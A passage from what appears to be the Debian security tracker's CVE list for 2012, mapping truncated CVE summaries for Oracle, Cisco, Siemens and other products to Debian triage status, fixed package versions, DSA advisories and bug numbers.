(Unspecified vulnerability in the PeopleSoft Enterprise Campus ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2012-3200 (Unspecified vulnerability in the Oracle Agile PLM Framework component ...) NOT-FOR-US: Oracle Supply Chain Products Suite CVE-2012-3199 (Unspecified vulnerability in Oracle Sun Solaris 10 and 11 allows local ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3198 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2012-3197 (Unspecified vulnerability in the MySQL Server component in Oracle ...) {DSA-2581-1} - mysql-5.1 - mysql-5.5 5.5.28+dfsg-1 (bug #690778) CVE-2012-3196 (Unspecified vulnerability in the Oracle Human Resources component in ...) NOT-FOR-US: Oracle E-Business Suite CVE-2012-3195 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2012-3194 (Unspecified vulnerability in the Oracle BI Publisher component in ...) 
NOT-FOR-US: Oracle Fusion Middleware CVE-2012-3193 (Unspecified vulnerability in the Oracle BI Publisher component in ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-3192 (Unspecified vulnerability in the PeopleSoft PeopleTools component in ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2012-3191 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2012-3190 (Unspecified vulnerability in the Oracle Universal Work Queue component ...) NOT-FOR-US: Oracle E-Business Suite CVE-2012-3189 (Unspecified vulnerability in Oracle Sun Solaris 11 allows remote ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3188 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2012-3187 (Unspecified vulnerability in Oracle Sun Solaris 10 allows local users ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3186 (Unspecified vulnerability in the Oracle WebCenter Sites component in ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-3185 (Unspecified vulnerability in the Oracle WebCenter Sites component in ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-3184 (Unspecified vulnerability in the Oracle WebCenter Sites component in ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-3183 (Unspecified vulnerability in the Oracle WebCenter Sites component in ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-3182 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2012-3181 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2012-3180 (Unspecified vulnerability in the MySQL Server component in Oracle ...) {DSA-2581-1} - mysql-5.1 - mysql-5.5 5.5.28+dfsg-1 (bug #690778) CVE-2012-3179 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...) 
NOT-FOR-US: Oracle PeopleSoft Products CVE-2012-3178 (Unspecified vulnerability in the kernel in Oracle Sun Solaris 11 ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3177 (Unspecified vulnerability in the MySQL Server component in Oracle ...) {DSA-2581-1} - mysql-5.1 - mysql-5.5 5.5.28+dfsg-1 (bug #690778) CVE-2012-3176 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2012-3175 (Unspecified vulnerability in the Oracle Application Server Single ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-3174 (Unspecified vulnerability in Oracle Java 7 before Update 11 allows ...) - openjdk-6 (Only affects Java 7) - openjdk-7 7u3-2.1.4-1 CVE-2012-3173 (Unspecified vulnerability in the MySQL Server component in Oracle ...) {DSA-2581-1} - mysql-5.1 - mysql-5.5 5.5.28+dfsg-1 (bug #690778) CVE-2012-3172 (Unspecified vulnerability in the Siebel CRM component in Oracle Siebel ...) NOT-FOR-US: Oracle Siebel CRM CVE-2012-3171 (Unspecified vulnerability in the Oracle Applications Technology Stack ...) NOT-FOR-US: Oracle E-Business Suite CVE-2012-3170 (Unspecified vulnerability in the Siebel CRM component in Oracle Siebel ...) NOT-FOR-US: Oracle Siebel CRM CVE-2012-3169 (Unspecified vulnerability in the Siebel CRM component in Oracle Siebel ...) NOT-FOR-US: Oracle Siebel CRM CVE-2012-3168 (Unspecified vulnerability in the Siebel CRM component in Oracle Siebel ...) NOT-FOR-US: Oracle Siebel CRM CVE-2012-3167 (Unspecified vulnerability in the MySQL Server component in Oracle ...) {DSA-2581-1} - mysql-5.1 - mysql-5.5 5.5.28+dfsg-1 (bug #690778) CVE-2012-3166 (Unspecified vulnerability in the MySQL Server component in Oracle ...) {DSA-2581-1} - mysql-5.1 - mysql-5.5 5.5.28+dfsg-1 (bug #690778) CVE-2012-3165 (Unspecified vulnerability in Oracle Sun Solaris 8, 9, 10, and 11 ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3164 (Unspecified vulnerability in the Oracle Marketing component in Oracle ...) 
NOT-FOR-US: Oracle E-Business Suite CVE-2012-3163 (Unspecified vulnerability in the MySQL Server component in Oracle ...) {DSA-2581-1} - mysql-5.1 - mysql-5.5 5.5.28+dfsg-1 (bug #690778) CVE-2012-3162 (Unspecified vulnerability in the Oracle Applications Framework ...) NOT-FOR-US: Oracle E-Business Suite CVE-2012-3161 (Unspecified vulnerability in the Oracle Agile PLM Framework component ...) NOT-FOR-US: Oracle Supply Chain Products Suite CVE-2012-3160 (Unspecified vulnerability in the MySQL Server component in Oracle ...) {DSA-2581-1} - mysql-5.1 - mysql-5.5 5.5.28+dfsg-1 (bug #690778) CVE-2012-3159 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2012-3158 (Unspecified vulnerability in the MySQL Server component in Oracle ...) {DSA-2581-1} - mysql-5.1 - mysql-5.5 5.5.28+dfsg-1 (bug #690778) CVE-2012-3157 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...) NOT-FOR-US: Oracle Financial Services Software CVE-2012-3156 (Unspecified vulnerability in the MySQL Server component in Oracle ...) - mysql-5.5 5.5.28+dfsg-1 (bug #690778) CVE-2012-3155 (Unspecified vulnerability in the CORBA ORB component in Sun GlassFish ...) - glassfish (bug #692035) CVE-2012-3154 (Unspecified vulnerability in the Oracle Agile PLM Framework component ...) NOT-FOR-US: Oracle Supply Chain Products Suite CVE-2012-3153 (Unspecified vulnerability in the Oracle Reports Developer component in ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-3152 (Unspecified vulnerability in the Oracle Reports Developer component in ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-3151 (Unspecified vulnerability in the Core RDBMS component in Oracle ...) NOT-FOR-US: Oracle Database Server CVE-2012-3150 (Unspecified vulnerability in the MySQL Server component in Oracle ...) 
{DSA-2581-1} - mysql-5.1 - mysql-5.5 5.5.28+dfsg-1 (bug #690778) CVE-2012-3149 (Unspecified vulnerability in the MySQL Server component in Oracle ...) - mysql-5.5 5.5.28+dfsg-1 (bug #690778) CVE-2012-3148 (Unspecified vulnerability in the Oracle Field Service component in ...) NOT-FOR-US: Oracle E-Business Suite CVE-2012-3147 (Unspecified vulnerability in the MySQL Server component in Oracle ...) - mysql-5.5 5.5.28+dfsg-1 (bug #690778) CVE-2012-3146 (Unspecified vulnerability in the Core RDBMS component in Oracle ...) NOT-FOR-US: Oracle Database Server CVE-2012-3145 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...) NOT-FOR-US: Oracle Financial Services Software CVE-2012-3144 (Unspecified vulnerability in the MySQL Server component in Oracle ...) - mysql-5.5 5.5.28+dfsg-1 (bug #690778) CVE-2012-3143 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-6 (Specific to Oracle Java, not present in IcedTea) - openjdk-7 (Specific to Oracle Java, not present in IcedTea) NOTE: Due to the vague disclosure policy by Oracle the exact nature is unknown but since no patch landed in icedtea, we consider it not-affected CVE-2012-3142 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...) NOT-FOR-US: Oracle Financial Services Software CVE-2012-3141 (Unspecified vulnerability in the Oracle FLEXCUBE Universal Banking ...) NOT-FOR-US: Oracle Financial Services Software CVE-2012-3140 (Unspecified vulnerability in the Oracle Agile PLM For Process ...) NOT-FOR-US: Oracle Supply Chain Products Suite CVE-2012-3139 (Unspecified vulnerability in the Oracle Application Object Library ...) NOT-FOR-US: Oracle E-Business Suite CVE-2012-3138 (Unspecified vulnerability in the Oracle iStore component in Oracle ...) NOT-FOR-US: Oracle E-Business Suite CVE-2012-3137 (The authentication protocol in Oracle Database Server 10.2.0.3, ...) 
NOT-FOR-US: Oracle Database CVE-2012-3136 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...) - openjdk-7 7u3-2.1.2-1 - openjdk-6 CVE-2012-3135 (Unspecified vulnerability in the Oracle JRockit component in Oracle ...) NOT-FOR-US: Oracle Fusion CVE-2012-3134 (Unspecified vulnerability in the Core RDBMS component in Oracle ...) NOT-FOR-US: Oracle Database Server CVE-2012-3133 (Buffer overflow in the DataDirect ODBC driver, as used in Oracle ...) NOT-FOR-US: Oracle CVE-2012-3132 (SQL injection vulnerability in Oracle Database Server 10.2.0.3, ...) NOT-FOR-US: Oracle Database CVE-2012-3131 (Unspecified vulnerability in Oracle Sun Solaris 9, 10, and 11 allows ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3130 (Unspecified vulnerability in Oracle Sun Solaris 11 allows remote ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3129 (Unspecified vulnerability in Oracle Sun Solaris 10 allows remote ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3128 (Unspecified vulnerability in Oracle SPARC T-Series Servers running ...) NOT-FOR-US: ILO firmware CVE-2012-3127 (Unspecified vulnerability in Oracle Sun Solaris 10 allows remote ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3126 (Unspecified vulnerability in the Solaris Cluster component in Oracle ...) NOT-FOR-US: Solaris Cluster CVE-2012-3125 (Unspecified vulnerability in Oracle Sun Solaris 8, 9, and 10 allows ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3124 (Unspecified vulnerability in Oracle Sun Solaris 10 allows remote ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3123 (Unspecified vulnerability in Oracle Sun Solaris 10 allows remote ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3122 (Unspecified vulnerability in Oracle Sun Solaris 8 and 9 allows local ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3121 (Unspecified vulnerability in Oracle Sun Solaris 9 and 10 allows remote ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3120 (Unspecified vulnerability in Oracle Sun Solaris 8 allows remote ...) 
NOT-FOR-US: Oracle Sun Solaris CVE-2012-3119 (Unspecified vulnerability in the PeopleSoft Enterprise HRMS component ...) NOT-FOR-US: Oracle PeopleSoft Products (PeopleSoft Enterprise HRMS) CVE-2012-3118 (Unspecified vulnerability in the PeoleSoft Enterprise PeopleTools ...) NOT-FOR-US: Oracle PeopleSoft Products (PeopleSoft Enterprise PeopleTools) CVE-2012-3117 (Unspecified vulnerability in the Oracle Transportation Management ...) NOT-FOR-US: Oracle Supply Chain Products Suite CVE-2012-3116 (Unspecified vulnerability in the Oracle Transportation Management ...) NOT-FOR-US: Oracle Supply Chain Products Suite CVE-2012-3115 (Unspecified vulnerability in the Oracle MapViewer component in Oracle ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-3114 (Unspecified vulnerability in the Oracle Transportation Management ...) NOT-FOR-US: Oracle Supply Chain Products Suite CVE-2012-3113 (Unspecified vulnerability in the PeopleSoft Enterprise HRMS component ...) NOT-FOR-US: Oracle PeopleSoft Products (PeopleSoft Enterprise HRMS) CVE-2012-3112 (Unspecified vulnerability in Oracle Sun Solaris 10 allows remote ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3111 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...) NOT-FOR-US: Oracle PeopleSoft Products (PeopleSoft Enterprise HRMS) CVE-2012-3110 (Unspecified vulnerability in the Oracle Outside In Technology ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-3109 (Unspecified vulnerability in the Oracle Outside In Technology ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-3108 (Unspecified vulnerability in the Oracle Outside In Technology ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-3107 (Unspecified vulnerability in the Oracle Outside In Technology ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-3106 (Unspecified vulnerability in the Oracle Outside In Technology ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-3105 (The glBufferData function in the WebGL implementation in Mozilla ...) 
- iceweasel 10.0.5esr-1 [squeeze] - iceweasel (Vulnerable code not present) CVE-2012-3104 RESERVED CVE-2011-5093 (Best Practical Solutions RT 4.x before 4.0.6 does not properly ...) NOTE: Dupe of CVE-2011-4458 CVE-2011-5092 (Best Practical Solutions RT 3.8.x before 3.8.12 and 4.x before 4.0.6 ...) NOTE: Dupe of CVE-2011-4458 CVE-2012-3103 RESERVED CVE-2012-3102 RESERVED CVE-2012-3101 RESERVED CVE-2012-3100 RESERVED CVE-2012-3099 RESERVED CVE-2012-3098 RESERVED CVE-2012-3097 RESERVED CVE-2012-3096 (Cisco Unity Connection (UC) 7.1, 8.0, and 8.5 allows remote ...) NOT-FOR-US: Cisco Unity Connection CVE-2012-3095 RESERVED CVE-2012-3094 (The VPN downloader in the download_install component in Cisco ...) NOT-FOR-US: Cisco AnyConnect Secure Mobility Client CVE-2012-3093 RESERVED CVE-2012-3092 RESERVED CVE-2012-3091 RESERVED CVE-2012-3090 RESERVED CVE-2012-3089 RESERVED CVE-2012-3088 (Cisco AnyConnect Secure Mobility Client 3.1.x before 3.1.00495, and ...) NOT-FOR-US: Cisco AnyConnect Secure Mobility Client CVE-2012-3087 RESERVED CVE-2012-3086 RESERVED CVE-2012-3085 RESERVED CVE-2012-3084 RESERVED CVE-2012-3083 RESERVED CVE-2012-3082 RESERVED CVE-2012-3081 RESERVED CVE-2012-3080 RESERVED CVE-2012-3079 (Cisco IOS 12.2 allows remote attackers to cause a denial of service ...) NOT-FOR-US: Cisco IOS CVE-2012-3078 RESERVED CVE-2012-3077 RESERVED CVE-2012-3076 (The administrative web interface on Cisco TelePresence Recording ...) NOT-FOR-US: Cisco Telepresence CVE-2012-3075 (The administrative web interface on Cisco TelePresence Immersive ...) NOT-FOR-US: Cisco Telepresence CVE-2012-3074 (An unspecified API on Cisco TelePresence Immersive Endpoint Devices ...) NOT-FOR-US: Cisco Telepresence CVE-2012-3073 (The IP implementation on Cisco TelePresence Multipoint Switch before ...) 
NOT-FOR-US: Cisco Telepresence CVE-2012-3072 RESERVED CVE-2012-3071 RESERVED CVE-2012-3070 RESERVED CVE-2012-3069 RESERVED CVE-2012-3068 RESERVED CVE-2012-3067 RESERVED CVE-2012-3066 RESERVED CVE-2012-3065 RESERVED CVE-2012-3064 RESERVED CVE-2012-3063 (Cisco Application Control Engine (ACE) before A4(2.3) and A5 before ...) NOT-FOR-US: Cisco CVE-2012-3062 RESERVED CVE-2012-3061 RESERVED CVE-2012-3060 (Cisco Unity Connection (UC) 8.6, 9.0, and 9.5 allows remote attackers ...) NOT-FOR-US: Cisco Unity Connection CVE-2012-3059 RESERVED CVE-2012-3058 (Cisco Adaptive Security Appliances (ASA) 5500 series devices, and the ...) NOT-FOR-US: Cisco CVE-2012-3057 (Heap-based buffer overflow in the Cisco WebEx Recording Format (WRF) ...) NOT-FOR-US: Cisco WebEx Player CVE-2012-3056 (Buffer overflow in the Cisco WebEx Recording Format (WRF) player T27 L ...) NOT-FOR-US: Cisco WebEx Player CVE-2012-3055 (Stack-based buffer overflow in the Cisco WebEx Recording Format (WRF) ...) NOT-FOR-US: Cisco WebEx Player CVE-2012-3054 (Heap-based buffer overflow in the Cisco WebEx Recording Format (WRF) ...) NOT-FOR-US: Cisco WebEx Player CVE-2012-3053 (Buffer overflow in the Cisco WebEx Advanced Recording Format (ARF) ...) NOT-FOR-US: Cisco WebEx Player CVE-2012-3052 (Untrusted search path vulnerability in Cisco VPN Client 5.0 allows ...) NOT-FOR-US: Cisco VPN Client CVE-2012-3051 (Cisco NX-OS 5.2 and 6.1 on Nexus 7000 series switches allows remote ...) NOT-FOR-US: Cisco NX-OS CVE-2012-3050 RESERVED CVE-2012-3049 RESERVED CVE-2012-3048 RESERVED CVE-2012-3047 RESERVED CVE-2012-3046 RESERVED CVE-2012-3045 RESERVED CVE-2012-3044 RESERVED CVE-2012-3043 RESERVED CVE-2012-3042 RESERVED CVE-2012-3041 RESERVED CVE-2012-3040 (Cross-site scripting (XSS) vulnerability in the web server on Siemens ...) NOT-FOR-US: Siemens CVE-2012-3039 RESERVED CVE-2012-3038 RESERVED CVE-2012-3037 (The Siemens SIMATIC S7-1200 2.x PLC does not properly protect the ...) 
NOT-FOR-US: Siemens SIMATIC PLC CVE-2012-3036 RESERVED CVE-2012-3035 (Buffer overflow in Emerson DeltaV 9.3.1 and 10.3 through 11.3.1 allows ...) NOT-FOR-US: Emerson DeltaV CVE-2012-3034 (WebNavigator in Siemens WinCC 7.0 SP3 and earlier, as used in SIMATIC ...) NOT-FOR-US: Siemens WinCC CVE-2012-3033 RESERVED CVE-2012-3032 (SQL injection vulnerability in WebNavigator in Siemens WinCC 7.0 SP3 ...) NOT-FOR-US: Siemens WinCC CVE-2012-3031 (Multiple cross-site scripting (XSS) vulnerabilities in WebNavigator in ...) NOT-FOR-US: Siemens WinCC CVE-2012-3030 (WebNavigator in Siemens WinCC 7.0 SP3 and earlier, as used in SIMATIC ...) NOT-FOR-US: Siemens WinCC CVE-2012-3029 RESERVED CVE-2012-3028 (Cross-site request forgery (CSRF) vulnerability in WebNavigator in ...) NOT-FOR-US: Siemens WinCC CVE-2012-3027 RESERVED CVE-2012-3026 (rifsrvd.exe in the Remote Interface Service in GE Intelligent ...) NOT-FOR-US: GE Intelligent Platforms Proficy Real-Time Information Portal CVE-2012-3025 (The default configuration of Tridium Niagara AX Framework through 3.6 ...) NOT-FOR-US: Tridium Niagara AX Framework CVE-2012-3024 (Tridium Niagara AX Framework through 3.6 uses predictable values for ...) NOT-FOR-US: Tridium Niagara AX Framework CVE-2012-3023 RESERVED CVE-2012-3022 (The SaveToFile method in a certain ActiveX control in TrendDisplay.dll ...) NOT-FOR-US: Canary Labs TrendLink CVE-2012-3021 (rifsrvd.exe in the Remote Interface Service in GE Intelligent ...) NOT-FOR-US: GE Intelligent Platforms Proficy Real-Time Information Portal CVE-2012-3020 (The Siemens Synco OZW Web Server devices OZW672.*, OZW772.*, and ...) NOT-FOR-US: Siemens Synco OZW Web Server CVE-2012-3019 RESERVED CVE-2012-3018 (The lockout-recovery feature in the Security Configurator component in ...) NOT-FOR-US: ICONICS GENESIS32 CVE-2012-3017 (Siemens SIMATIC S7-400 PN CPU devices with firmware 5.x allow remote ...) 
NOT-FOR-US: Siemens SIMATIC CVE-2012-3016 (Siemens SIMATIC S7-400 PN CPU devices with firmware 6 before 6.0.3 ...) NOT-FOR-US: Siemens SIMATIC CVE-2012-3015 (Untrusted search path vulnerability in Siemens SIMATIC STEP7 before ...) NOT-FOR-US: Siemens SIMATIC CVE-2012-3014 (The Management Software application in GarrettCom Magnum MNS-6K before ...) NOT-FOR-US: GarrettCom Magnum MNS-6K CVE-2012-3013 (WAGO I/O System 758 model 758-870, 758-874, 758-875, and 758-876 ...) NOT-FOR-US: WAGO I/O System 758 CVE-2012-3012 (The Arbiter Power Sentinel 1133A device with firmware before 11Jun2012 ...) NOT-FOR-US: Arbiter Power Sentinel 1133A CVE-2012-3011 (Directory traversal vulnerability in the web server in Fultek WinTr ...) NOT-FOR-US: Fultek WinTr Scada web server CVE-2012-3010 (rifsrvd.exe in the Remote Interface Service in GE Intelligent ...) NOT-FOR-US: GE Intelligent Platforms Proficy Real-Time Information Portal CVE-2012-3009 (Siemens COMOS before 9.1 Patch 413, 9.2 before Update 03 Patch 023, ...) NOT-FOR-US: Siemens COMOS CVE-2012-3008 (Stack-based buffer overflow in OSIsoft PI OPC DA Interface before ...) NOT-FOR-US: OSIsoft PI OPC DA Interface CVE-2012-3007 (Stack-based buffer overflow in slssvc.exe before 58.x in Invensys ...) NOT-FOR-US: Invensys Wonderware SuiteLink CVE-2012-3006 (The Innominate mGuard Smart HW before HW-101130 and BD before ...) NOT-FOR-US: Innominate mGuard Smart CVE-2012-3005 (Untrusted search path vulnerability in Invensys Wonderware InTouch ...) NOT-FOR-US: Wonderwar CVE-2012-3004 (Multiple untrusted search path vulnerabilities in RealFlex RealWin ...) NOT-FOR-US: RealFlex RealWin CVE-2012-3003 (Open redirect vulnerability in an unspecified web application in ...) NOT-FOR-US: WinCC CVE-2012-3002 (The web interface on (1) Foscam and (2) Wansview IP cameras allows ...) NOT-FOR-US: Foscam, Wansview IP cameras CVE-2012-3001 (Mutiny Standard before 4.5-1.12 allows remote attackers to execute ...) 
NOT-FOR-US: Mutiny Standard CVE-2012-3000 RESERVED CVE-2012-2999 (Multiple cross-site request forgery (CSRF) vulnerabilities in the web ...) NOT-FOR-US: Cerberus FTP CVE-2012-2998 (SQL injection vulnerability in the ad hoc query module in Trend Micro ...) NOT-FOR-US: Trend Micro Control Manager CVE-2012-2997 RESERVED CVE-2012-2996 (Cross-site request forgery (CSRF) vulnerability in ...) NOT-FOR-US: Trend Micro CVE-2012-2995 (Multiple cross-site scripting (XSS) vulnerabilities in Trend Micro ...) NOT-FOR-US: Trend Micro CVE-2012-2994 (The CoSoSys Endpoint Protector 4 appliance establishes an EPProot ...) NOT-FOR-US: CoSoSys Endpoint Protector CVE-2012-2993 (Microsoft Windows Phone 7 does not verify the domain name in the ...) NOT-FOR-US: Microsoft Windows Phone CVE-2012-2992 RESERVED CVE-2012-2991 (The PayPal (aka MODULE_PAYMENT_PAYPAL_STANDARD) module before 1.1 in ...) NOT-FOR-US: PayPal module in osCommerce Online Merchant CVE-2012-2990 (The MASetupCaller ActiveX control before 1.4.2012.508 in ...) NOT-FOR-US: MarkAny ContentSAFER CVE-2012-2989 RESERVED CVE-2012-2988 RESERVED CVE-2012-2987 RESERVED CVE-2012-2986 (lhn/public/network/ping in HP SAN/iQ 9.5 on the HP Virtual SAN ...) NOT-FOR-US: HP Virtual SAN Appliance CVE-2012-2985 (Cross-site scripting (XSS) vulnerability in InsertDocument.aspx in ...) NOT-FOR-US: CuteSoft Cute Editor CVE-2012-2984 (Multiple cross-site scripting (XSS) vulnerabilities in ...) NOT-FOR-US: Websense CVE-2012-2983 (file/edit_html.cgi in Webmin 1.590 and earlier does not perform an ...) NOT-FOR-US: Webmin CVE-2012-2982 (file/show.cgi in Webmin 1.590 and earlier allows remote authenticated ...) NOT-FOR-US: Webmin CVE-2012-2981 (Webmin 1.590 and earlier allows remote authenticated users to execute ...) NOT-FOR-US: Webmin CVE-2012-2980 (The Samsung and HTC onTouchEvent method implementation for Android on ...) 
NOT-FOR-US: Samsung and HTC Android CVE-2012-2979 [VU#517036: NSD 3.2.13 emergency release] RESERVED - nsd3 (Debian version not affected) CVE-2012-2978 (query.c in NSD 3.0.x through 3.0.8, 3.1.x through 3.1.1, and 3.2.x ...) {DSA-2515-1} - nsd3 3.2.12-1 CVE-2012-2977 (The management console in Symantec Web Gateway 5.0.x before 5.0.3.18 ...) NOT-FOR-US: Symantec Web Gateway CVE-2012-2976 (The management console in Symantec Web Gateway 5.0.x before 5.0.3.18 ...) NOT-FOR-US: Symantec Web Gateway CVE-2012-2975 (Cross-site scripting (XSS) vulnerability in the traffic overview page ...) NOT-FOR-US: F5 ASM CVE-2012-2974 (The web interface on the SMC SMC8024L2 switch allows remote attackers ...) NOT-FOR-US: SMC SMC8024L2 switch CVE-2012-2973 RESERVED CVE-2012-2972 (The (1) server and (2) agent components in CA ARCserve Backup r12.5, ...) NOT-FOR-US: CA ARCserve Backup CVE-2012-2971 (The server in CA ARCserve Backup r12.5, r15, and r16 on Windows does ...) NOT-FOR-US: CA ARCserve Backup CVE-2012-2970 (The Synel SY-780/A Time & Attendance terminal allows remote attackers ...) NOT-FOR-US: Synel terminal CVE-2012-2969 (Caucho Quercus, as distributed in Resin before 4.0.29, allows remote ...) NOT-FOR-US: Caucho Quercus CVE-2012-2968 (Directory traversal vulnerability in Caucho Quercus, as distributed in ...) NOT-FOR-US: Caucho Quercus CVE-2012-2967 (Caucho Quercus, as distributed in Resin before 4.0.29, does not ...) NOT-FOR-US: Caucho Quercus CVE-2012-2966 (Caucho Quercus, as distributed in Resin before 4.0.29, overwrites ...) NOT-FOR-US: Caucho Quercus CVE-2012-2965 (Caucho Quercus, as distributed in Resin before 4.0.29, does not ...) NOT-FOR-US: Caucho Quercus CVE-2012-2964 (The BreakingPoint Storm appliance before 3.0 requires cleartext ...) NOT-FOR-US: BreakingPoint Storm appliance CVE-2012-2963 (The administrative interface in the embedded web server on the ...) 
NOT-FOR-US: BreakingPoint Storm appliance CVE-2012-2962 (SQL injection vulnerability in d4d/statusFilter.php in Plixer ...) NOT-FOR-US: Dell SonicWALL Scrutinizer CVE-2012-2961 (SQL injection vulnerability in the management console in Symantec Web ...) NOT-FOR-US: Symantec Web Gateway CVE-2012-2960 (Cross-site scripting (XSS) vulnerability in the import functionality ...) NOT-FOR-US: HP ArcSight Connector, ArcSight Logger CVE-2012-2959 (Cross-site request forgery (CSRF) vulnerability in ...) NOT-FOR-US: BMC CVE-2012-2958 RESERVED CVE-2012-2957 (The management console in Symantec Web Gateway 5.0.x before 5.0.3.18 ...) NOT-FOR-US: Symantec Web Gateway CVE-2012-2956 RESERVED CVE-2012-2955 (Multiple cross-site scripting (XSS) vulnerabilities in the ...) NOT-FOR-US: IBM Lotus Protector, IBM ISS Proventia Network Mail Security CVE-2012-2954 RESERVED CVE-2012-2953 (The management console in Symantec Web Gateway 5.0.x before 5.0.3.18 ...) NOT-FOR-US: Symantec Web Gateway CVE-2012-2952 (SQL injection vulnerability in add_ons.php in Jaow 2.4.5 and earlier ...) NOT-FOR-US: Jaow CVE-2012-2951 (SQL injection vulnerability in plog-rss.php in Plogger allows remote ...) NOT-FOR-US: Plogger CVE-2012-2950 RESERVED CVE-2012-2949 (The ZTE sync_agent program for Android 2.3.4 on the Score M device ...) NOT-FOR-US: Android CVE-2012-2948 (chan_skinny.c in the Skinny (aka SCCP) channel driver in Certified ...) {DSA-2493-1} - asterisk 1:1.8.13.0~dfsg-1 (bug #675210) CVE-2012-2947 (chan_iax2.c in the IAX2 channel driver in Certified Asterisk ...) {DSA-2493-1} - asterisk 1:1.8.13.0~dfsg-1 (bug #675204) CVE-2012-2946 RESERVED CVE-2012-2945 RESERVED - hadoop (bug #535861) CVE-2010-5140 (wxBitcoin and bitcoind before 0.3.13 do not properly handle bitcoins ...) - bitcoin (Fixed before initial release) CVE-2010-5139 (Integer overflow in wxBitcoin and bitcoind before 0.3.11 allows remote ...) 
- bitcoin (Fixed before initial release) CVE-2010-5138 (wxBitcoin and bitcoind 0.3.x allow remote attackers to cause a denial ...) - bitcoin 0.4.0-1 CVE-2010-5137 (wxBitcoin and bitcoind before 0.3.5 allow remote attackers to cause a ...) - bitcoin (Fixed before initial release) CVE-2012-2944 (Buffer overflow in the addchar function in common/parseconf.c in upsd ...) {DSA-2484-1} - nut 2.6.4-1 NOTE: https://alioth.debian.org/tracker/index.php?func=detail&aid=313636&group_id=30602&atid=411542 CVE-2012-2943 (CRLF injection vulnerability in cryptographp.inc.php in Cryptographp ...) NOT-FOR-US: Cryptographp CVE-2012-2942 (Buffer overflow in the trash buffer in the header capture ...) - haproxy 1.4.23-1 (bug #674447) NOTE: According to upstream information this only was fixed in 1.4.21 NOTE: only a issue if using non-default value for global.tune.bufsize configuration option NOTE: Reported as duplicate with CVE-2012-2391 http://seclists.org/oss-sec/2012/q2/417 CVE-2012-2941 (Cross-site scripting (XSS) vulnerability in search/ in Yandex.Server ...) NOT-FOR-US: Yandex.Server 2010 9.0 Enterprise CVE-2012-2940 (MediaChance Real-DRAW PRO 5.2.4 allows remote attackers to cause a ...) NOT-FOR-US: MediaChance Real-DRAW PRO CVE-2012-2939 (Multiple unrestricted file upload vulnerabilities in Travelon Express ...) NOT-FOR-US: Travelon Express CVE-2012-2938 (Multiple cross-site scripting (XSS) vulnerabilities in Travelon ...) NOT-FOR-US: Travelon Express CVE-2012-2937 (Multiple SQL injection vulnerabilities in Pligg CMS before 1.2.2 allow ...) NOT-FOR-US: Pligg CVE-2012-2936 (Multiple cross-site scripting (XSS) vulnerabilities in Pligg CMS ...) NOT-FOR-US: Pligg CVE-2012-2935 (Cross-site scripting (XSS) vulnerability in ...) NOT-FOR-US: OSCommerce Online Merchant CVE-2012-2934 (Xen 4.0, and 4.1, when running a 64-bit PV guest on "older" AMD CPUs, ...) 
